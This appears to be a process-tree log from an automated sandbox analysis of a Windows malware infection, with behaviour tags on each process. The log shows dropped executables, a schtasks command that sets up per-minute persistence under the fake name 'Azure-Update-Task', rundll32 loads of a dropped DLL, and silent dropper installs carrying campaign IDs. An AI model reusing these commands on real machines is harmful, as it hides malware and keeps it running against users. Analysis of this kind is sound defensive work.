c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1420

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1296

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1192

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1072

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:696
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5752
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    - Executes dropped EXE
    PID:4836
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2728
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:6916
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:6736
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:5348
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
  2⤵
  PID:6256
- - C:\Windows\SysWOW64\schtasks.exe
    /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"
    3⤵
    - Creates scheduled task(s)
    PID:4388
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:4596
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:6856
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:4392
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:204
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:6972
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:7024
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:6252
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:6652
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5580
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:3756
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:2312
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:4624
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5696
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:6872
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:6596
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:6224
- C:\Users\Admin\AppData\Roaming\vecgdru
  C:\Users\Admin\AppData\Roaming\vecgdru
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:4688
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:4736
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:1088
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:2316
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:5788
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5764
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:5856
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:7004
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:5928
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:6112
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:6512
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:7096
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:6612
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:384
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:1000
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5084
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:1012
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:1736
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:1740
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:2144
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:3012
- C:\Users\Admin\AppData\Roaming\vecgdru
  C:\Users\Admin\AppData\Roaming\vecgdru
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:3188
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:600
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:380
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:4296
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:6948
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:4644
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:4712
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:4736
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:4768
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5060
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:6252
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:96
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:6600
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:7100
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:5532
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5988
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:6604
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:3656
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:2616

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:1012

C:\Users\Admin\AppData\Local\Temp\7zS0C2495D3\Sun157a449716c8ee483.exe
Sun157a449716c8ee483.exe /mixone
1⤵
- Executes dropped EXE
PID:4432
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 660
  2⤵
  - Drops file in Windows directory
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1776
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 676
  2⤵
  - Program crash
  PID:4416
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 712
  2⤵
  - Program crash
  PID:4468
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 696
  2⤵
  - Program crash
  PID:4224
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 888
  2⤵
  - Program crash
  PID:6040

C:\Users\Admin\AppData\Local\Temp\is-PGKD6.tmp\Sun15b61bf18b0f1.tmp
"C:\Users\Admin\AppData\Local\Temp\is-PGKD6.tmp\Sun15b61bf18b0f1.tmp" /SL5="$20086,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS0C2495D3\Sun15b61bf18b0f1.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4584
- C:\Users\Admin\AppData\Local\Temp\is-4U2G7.tmp\46807GHF____.exe
  "C:\Users\Admin\AppData\Local\Temp\is-4U2G7.tmp\46807GHF____.exe" /S /UID=burnerch2
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Program Files directory
  PID:4816
- - C:\Program Files\Internet Explorer\TAHLZEKRLB\ultramediaburner.exe
    "C:\Program Files\Internet Explorer\TAHLZEKRLB\ultramediaburner.exe" /VERYSILENT
    3⤵
    - Executes dropped EXE
    PID:6060
  - - C:\Users\Admin\AppData\Local\Temp\is-K5T9O.tmp\ultramediaburner.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-K5T9O.tmp\ultramediaburner.tmp" /SL5="$5029C,281924,62464,C:\Program Files\Internet Explorer\TAHLZEKRLB\ultramediaburner.exe" /VERYSILENT
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      Suspicious use of FindShellTrayWindow
      PID:4524
    - - C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        5⤵
        Executes dropped EXE
        
        PID:5328
- - C:\Users\Admin\AppData\Local\Temp\6a-b330a-c33-68f9f-9efc94731d8bd\ZHikoviralo.exe
    "C:\Users\Admin\AppData\Local\Temp\6a-b330a-c33-68f9f-9efc94731d8bd\ZHikoviralo.exe"
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    PID:5768
- - C:\Users\Admin\AppData\Local\Temp\86-4dec9-1f6-2f1a5-02820daf8d5a3\Burikazhehae.exe
    "C:\Users\Admin\AppData\Local\Temp\86-4dec9-1f6-2f1a5-02820daf8d5a3\Burikazhehae.exe"
    3⤵
    - Executes dropped EXE
    PID:2088
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5wniv2zs.g2z\GcleanerEU.exe /eufive & exit
      4⤵
      PID:4124
    - - C:\Users\Admin\AppData\Local\Temp\5wniv2zs.g2z\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\5wniv2zs.g2z\GcleanerEU.exe /eufive
        5⤵
        Executes dropped EXE
        
        PID:4776
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hbvk0x4d.rat\installer.exe /qn CAMPAIGN="654" & exit
      4⤵
      PID:3708
    - - C:\Users\Admin\AppData\Local\Temp\hbvk0x4d.rat\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\hbvk0x4d.rat\installer.exe /qn CAMPAIGN="654"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Modifies system certificate store
        Suspicious use of FindShellTrayWindow
        
        PID:6184
      - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\hbvk0x4d.rat\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\hbvk0x4d.rat\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631211499 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        6⤵
        
        PID:6660
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vrerkahh.d5h\anyname.exe & exit
      4⤵
      PID:6292
    - - C:\Users\Admin\AppData\Local\Temp\vrerkahh.d5h\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\vrerkahh.d5h\anyname.exe
        5⤵
        Executes dropped EXE
        
        PID:6512
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\skdvuose.pq4\gcleaner.exe /mixfive & exit
      4⤵
      PID:6572
    - - C:\Users\Admin\AppData\Local\Temp\skdvuose.pq4\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\skdvuose.pq4\gcleaner.exe /mixfive
        5⤵
        Executes dropped EXE
        
        PID:6664
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\owfmva2d.lim\autosubplayer.exe /S & exit
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:7164

C:\Users\Admin\AppData\Local\Temp\7zS0C2495D3\Sun1584240df9fe73a3.exe
Sun1584240df9fe73a3.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4340
- C:\ProgramData\3673961.exe
  "C:\ProgramData\3673961.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:5012
- - C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
    3⤵
    - Executes dropped EXE
    PID:1152
- C:\ProgramData\1723234.exe
  "C:\ProgramData\1723234.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4664
- C:\ProgramData\4479475.exe
  "C:\ProgramData\4479475.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4972
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 4972 -s 1892
    3⤵
    - Program crash
    PID:5396

C:\Users\Admin\AppData\Local\Temp\7zS0C2495D3\Sun15223697c98.exe
Sun15223697c98.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4260

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:4112
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:4576

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Loads dropped DLL
PID:4576

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5660

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5548

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:5092

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:6708

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:6744
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 24506D1D68DB3CF0B5CE96E3D999D005 C
  2⤵
  - Loads dropped DLL
  PID:6996
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 50D2CC087F15B6BC62F11170EA812E0C
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  PID:3360
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:5792
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding B73965089E15F33616DEB76DD7798F9C E Global\MSI0000
  2⤵
  - Loads dropped DLL
  PID:5572

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
PID:6876

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Loads dropped DLL
PID:6616

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6556

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5832

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4556

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:6464

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
PID:5932

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" /update
1⤵
PID:528
- C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
  C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions
  2⤵
  - Modifies system executable filetype association
  - Adds Run key to start application
  - Modifies Internet Explorer settings
  - Modifies registry class
  PID:4904
- - C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe
    "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe"
    3⤵
    - Loads dropped DLL
    - Modifies registry class
    PID:6828

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:1936

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4264

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:6152

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:1776

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
PID:3140

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4708

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6056

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4580

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"
1⤵
PID:6720

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:6880

